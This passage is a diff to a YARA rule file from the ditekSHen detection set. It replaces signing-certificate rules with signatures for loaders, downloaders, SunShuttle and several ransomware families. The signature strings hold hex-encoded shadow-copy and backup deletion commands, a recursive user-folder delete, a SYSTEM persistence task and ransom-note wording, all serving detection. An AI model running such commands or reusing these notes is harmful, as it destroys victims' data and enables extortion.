-		thumbprint = "1078c0ab5766a48b0d4e04e57f3ab65b68dd797f"
-		importance = 20
+
+	strings:
+		$s1 = "Content-Disposition: attachment; filename=" ascii
+		$s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii
+		$s3 = "/tor/status-vote/current/consensus" ascii
+		$s4 = "/tor/server/fp/" ascii
+		$s5 = "/tor/rendezvous2/" ascii
+		$s6 = "404 Not found" fullword ascii
+		$s7 = /_request@\d+/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUN & STARZ LIMITED" and pe.signatures [ i ] . serial == "29:a2:48:a7:7d:5d:40:66:fe:5d:a7:5f:32:10:2b:b5" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3A9Bdec10E00E780316Baaebfe7A772C : FILE
+rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "0879b4f7-4058-5391-b8bf-90a46ef337f6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L941-L952"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4907-L4920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1c0d23c9aa2ff705e3350e15b7ff83fc007ce6aaa57c4ed59201f3022f5d00a"
+		logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "981b95ffcb259862e7461bc58516d7785de91a8a"
-		importance = 20
+		tags = ""
+
+	strings:
+		$rp1 = "GetType('RunPe.RunPe'" ascii
+		$rp2 = "GetType(\"RunPe.RunPe\"" ascii
+		$rm1 = "GetMethod('Run'" ascii
+		$rm2 = "GetMethod(\"Run\"" ascii
+		$s1 = ".Invoke(" ascii
+		$s2 = "[Reflection.Assembly]::Load(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" )
+		all of ( $s* ) and 1 of ( $rp* ) and 1 of ( $rm* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_73F9819F3A1A49Bac1E220D7F3E0009B : FILE
+rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "06f448cf-1f0e-5db5-bdb5-30238c5f7341"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "08261054-bebc-58fe-949a-27f6e817003a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L954-L965"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4922-L4934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9244fae0be6c1addbd0c740d7e153fd4109101184bc61375ddadb6d784769010"
+		logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "bb04986cbd65f0994a544f197fbb26abf91228d9"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "'.Replace('" ascii nocase
+		$s2 = "'aspnet_compiler.exe'" ascii
+		$s3 = "[Byte[]]$" ascii
+		$pe1 = "(77,90," ascii
+		$pe2 = "='4D5A" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jean Binquet" and pe.signatures [ i ] . serial == "73:f9:81:9f:3a:1a:49:ba:c1:e2:20:d7:f3:e0:00:9b" )
+		all of ( $s* ) and ( #pe1 > 1 or #pe2 > 1 ) and #s1 > 4
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0989C97804C93Ec0004E2843 : FILE
+rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PE loader / injector. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "13b2dd06-878e-5539-91d1-eff8607997c3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "262dedee-05d2-5783-b0ff-24470d310ab8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L967-L978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4936-L4950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "65b695eed221db86928ebd32a1f3cb35729754ba41cb2e5b6cf944890d211120"
+		logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "98549ae51b7208bda60b7309b415d887c385864b"
-		importance = 20
+
+	strings:
+		$s1 = "commandLine'" fullword ascii
+		$s2 = "RunPe.dll" fullword ascii
+		$s3 = "HandleRun" fullword ascii
+		$s4 = "inheritHandles" fullword ascii
+		$s5 = "BlockCopy" fullword ascii
+		$s6 = "WriteProcessMemory" fullword ascii
+		$s7 = "startupInfo" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai Hintsoft Co., Ltd." and pe.signatures [ i ] . serial == "09:89:c9:78:04:c9:3e:c0:00:4e:28:43" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Ba32F984444Ea464Bea41D99A977Ea8 : FILE
+rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "6fee5b3f-f72e-531e-b11e-e402207072ff"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "09823302-34e0-5283-9740-1475ab8077be"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L980-L991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4952-L4963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fcabdd038a2594dffddbfff71a7a8a1abae89c637355b3be7e5f26c1eb9e39c7"
+		logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ae9e65e26275d014a4a8398569af5eeddf7a472c"
-		importance = 20
+
+	strings:
+		$x1 = "Managament.inf" fullword ascii
+		$x2 = "rOnAlDo" fullword ascii
+		$x3 = "untimeResourceSet" fullword ascii
+		$x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JIN CONSULTANCY LIMITED" and pe.signatures [ i ] . serial == "6b:a3:2f:98:44:44:ea:46:4b:ea:41:d9:9a:97:7e:a8" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4F5A9Bf75Da76B949645475473793A7D : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known downloader agent downloading encoded binaries in patches"
 		author = "ditekSHen"
-		id = "094b56b9-15fc-5366-9023-c706613882c4"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e3450f93-7c57-5386-a901-bc5e710657a4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L993-L1004"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4965-L4975"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8f00efcd62a934fb6ec0205dc1d7bb7f7f3ab168150fee942536ef92f686d21d"
+		logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f7de21bbdf5effb0f6739d505579907e9f812e6f"
-		importance = 20
+		snort2_sid = "920122"
+		snort3_sid = "920119"
+
+	strings:
+		$pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" )
+		uint16( 0 ) == 0x5a4d and $pat and #pat > 1
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_68B050Aa3D2C16F77E14A16Dc8D1C1Ac : FILE
+rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects DoejoCrypt / DearCry ransomware"
 		author = "ditekSHen"
-		id = "b49d3f1d-34b4-578e-ab36-b0744deef548"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1006-L1017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4977-L4993"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9de23897fbfe3c4a6d649558d1d71f890117ec80967bc5bd975aa6f33576c702"
+		logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c757e09e7dc5859dbd00b0ccfdd006764c557a3d"
-		importance = 20
+
+	strings:
+		$s1 = "DEARCRY!" fullword ascii
+		$s2 = ".CRYPT" fullword ascii
+		$s3 = "\\EncryptFile -svcV2\\" ascii
+		$s4 = "please send me the following hash!" ascii
+		$s5 = "dear!!!" fullword ascii
+		$s6 = "/readme.txt" fullword ascii
+		$o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff }
+		$o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a }
+		$o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW POKE LTD" and pe.signatures [ i ] . serial == "68:b0:50:aa:3d:2c:16:f7:7e:14:a1:6d:c8:d1:c1:ac" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and ( 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0F2B44E398Ba76C5F57779C41548607B : FILE
+rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects SunShuttle / GoldMax"
 		author = "ditekSHen"
-		id = "6a962fd8-c2cd-5abd-8f80-95697771037c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1019-L1030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4995-L5017"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "172622595a3f6a6ab4ac2677c3064fab87b0a872c261031331c99cbd58671da2"
+		logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cef53e9ca954d1383a8ece037925aa4de9268f3f"
-		importance = 20
+
+	strings:
+		$s1 = "main.beaconing" fullword ascii
+		$s2 = "main.clean_file" fullword ascii
+		$s3 = "main.decrypt" fullword ascii
+		$s4 = "main.define_internal_settings" fullword ascii
+		$s5 = "main.delete_empty" fullword ascii
+		$s6 = "main.encrypt" fullword ascii
+		$s7 = "main.false_requesting" fullword ascii
+		$s8 = "main.removeBase64Padding" fullword ascii
+		$s9 = "main.resolve_command" fullword ascii
+		$s10 = "main.retrieve_session_key" fullword ascii
+		$s11 = "main.save_internal_settings" fullword ascii
+		$s12 = "main.send_command_result" fullword ascii
+		$s13 = "main.send_file_part" fullword ascii
+		$s14 = "main.wget_file" fullword ascii
+		$s15 = "main.write_file" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DR" and pe.signatures [ i ] . serial == "0f:2b:44:e3:98:ba:76:c5:f5:77:79:c4:15:48:60:7b" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Ad4Ce116B131Daf8D784C6Fab2Ea1F1 : FILE
+rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects RanzyLocker / REntS ransomware"
 		author = "ditekSHen"
-		id = "abb6c51b-987a-5a1f-9d31-1422b41a6a6d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1032-L1043"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5019-L5042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3221ffd8203cbef8735ed48acd77daae6bee33ade236b1ff2ced81a0f27d4ce5"
+		logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "de2dad893fdd49d7c0d498c0260acfb272588a2b"
-		importance = 20
+
+	strings:
+		$hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
+		$hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii
+		$hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
+		$hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$hx3 = "227375626964223A22" ascii
+		$hx4 = "226E6574776F726B223A22" ascii
+		$hx5 = "726561646D652E747874" ascii
+		$hx6 = "-nolan" fullword wide
+		$o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b }
+		$o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 }
+		$o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 }
+		$o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORDARA LTD" and pe.signatures [ i ] . serial == "5a:d4:ce:11:6b:13:1d:af:8d:78:4c:6f:ab:2e:a1:f1" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $hx* ) or ( 2 of ( $hr* ) and 2 of ( $hx* ) ) or ( all of ( $o* ) and 2 of ( $h* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_48Ce01Ac7E137F4313Cc5723Af817Da0 : FILE
+rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects WobbyChipMBR / Covid-21 ransomware"
 		author = "ditekSHen"
-		id = "d5eb08a7-eb2b-5318-a941-da3ce0a6b634"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "581fbce1-128d-5323-a259-14d9bfdf09b1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1045-L1056"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5044-L5060"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d92d4aa491b028620f17fd997a782f5e75247b2d3de7ef9026e2c62309275ce1"
+		logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8f594f2e0665ffd656160aac235d8c490059a9cc"
-		importance = 20
+
+	strings:
+		$x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide
+		$x2 = "Reinstalling Windows has been blocked" ascii wide
+		$x3 = "Enter Decryption Key:" ascii wide
+		$x4 = "encrypted with military grade encryption" ascii wide
+		$s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii
+		$s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide
+		$s3 = "DumpHex" fullword ascii
+		$s4 = "TFTP Error" fullword wide
+		$s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ET HOMES LTD" and pe.signatures [ i ] . serial == "48:ce:01:ac:7e:13:7f:43:13:cc:57:23:af:81:7d:a0" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C7E62986C36246C64B8C9F2348141570 : FILE
+rule DITEKSHEN_MALWARE_Win_Snatch : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Snatch / GoRansome / MauriGo ransomware"
 		author = "ditekSHen"
-		id = "44d75e1d-5d5b-5d6f-8f7b-d94cd3908ed7"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "00dce673-b909-571f-8117-c5d4ce73fb31"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1058-L1069"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5062-L5091"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfb669ad42ac16d954405dc243b9d81dd9a748a14044d1fce3b71b490c58c82e"
+		logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "f779e06266802b395ef6d3dbfeb1cc6a0a2cfc47"
-		importance = 20
+
+	strings:
+		$s1 = "main.encryptFile" ascii
+		$s2 = "main.encryptFileExt" ascii
+		$s3 = "main.deleteShadowCopy" ascii
+		$s4 = "main.Shadow" fullword ascii
+		$s5 = "main.RecoverMe" fullword ascii
+		$s6 = "main.EncryptWithPublicKey" ascii
+		$s7 = "main.EncoderLookupDir" fullword ascii
+		$s8 = "main.ALIGNUP" fullword ascii
+		$s9 = "main.encrypt" fullword ascii
+		$s10 = "github.com/mauri870/ransomware" ascii
+		$m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii
+		$m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii
+		$m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii
+		$m4 = ":HELP FEEED A CHILD:" ascii
+		$m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii
+		$m6 = "YOUR IDENTIFICATION : %s" ascii
+		$m7 = "convince you of our honesty" ascii
+		$m8 = "use TOR browser to talk with support" ascii
+		$m9 = "encrypted and attackers are taking" ascii
+		$p1 = "/Go/src/kitty/kidrives/" ascii
+		$p2 = "/LGoGo/encoder.go" ascii nocase
+		$p3 = "/Go/src/kitty/kidata/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "c7:e6:29:86:c3:62:46:c6:4b:8c:9f:23:48:14:15:70" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $m* ) or ( 1 of ( $m* ) and 1 of ( $s* ) ) or ( all of ( $p* ) and ( 1 of ( $s* ) or 1 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ee663737D82Df09C7038A6A6693A8323 : FILE
+rule DITEKSHEN_MALWARE_Win_Meteorite : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Meteorite downloader"
 		author = "ditekSHen"
-		id = "c6684a9f-ca92-53e9-9723-9d2437a16fc6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1086-L1097"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5093-L5109"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4057374b73ef13b6f101b939e11569cf010896097fd9322ab490c73d6808fa6f"
+		logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dc934afe82adbab8583e393568f81ab32c79aeea"
-		importance = 20
+
+	strings:
+		$x1 = "MeteoriteDownloader" fullword ascii wide
+		$x2 = "Meteorite Downloader" fullword ascii wide
+		$x3 = "Meteorite Downloader v" wide
+		$s1 = "regwrite" fullword wide
+		$s2 = "urlmon" fullword ascii
+		$s3 = "wscript.shell" fullword wide
+		$s4 = "modMain" fullword ascii
+		$s5 = "VBA6.DLL" fullword ascii
+		$s6 = "^_http" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREACIJA d.o.o." and pe.signatures [ i ] . serial == "00:ee:66:37:37:d8:2d:f0:9c:70:38:a6:a6:69:3a:83:23" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3D568325Dec56Abf48E72317675Cacb7 : FILE
+rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects LegionLocker ransomware"
 		author = "ditekSHen"
-		id = "e958b9c4-2f1b-5b5d-8a44-7393204a6f41"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1099-L1110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5111-L5129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a575c9989a3ee7824e8734940877ddb255b19070def460508f70d32f457411ac"
+		logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e5b21024907c9115dafccc3d4f66982c7d5641bc"
-		importance = 20
+
+	strings:
+		$m1 = "+Do not run task manager, powershell, cmd etc." ascii wide
+		$m2 = "3 hours your files will be deleted." ascii wide
+		$m3 = "files have been encrypted by Legion Locker" ascii wide
+		$s1 = "passwordBytes" fullword ascii
+		$s2 = "_start_enc_" ascii
+		$s3 = "_del_desktop_" ascii
+		$s4 = "Processhacker" wide
+		$s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide
+		$s6 = "Submit code" fullword wide
+		$pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii
+		$pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Virtual Byte F-B-I" and pe.signatures [ i ] . serial == "3d:56:83:25:de:c5:6a:bf:48:e7:23:17:67:5c:ac:b7" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $m* ) or 1 of ( $pdb* ) or 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3533080B377F80C0Ea826B2492Bf767B : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Go-based downloader"
 		author = "ditekSHen"
-		id = "42d2328e-742e-5c35-aa14-3b42442543ce"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e16ccb89-2eb6-5457-a88e-f802f3c35764"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1127-L1138"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5131-L5144"
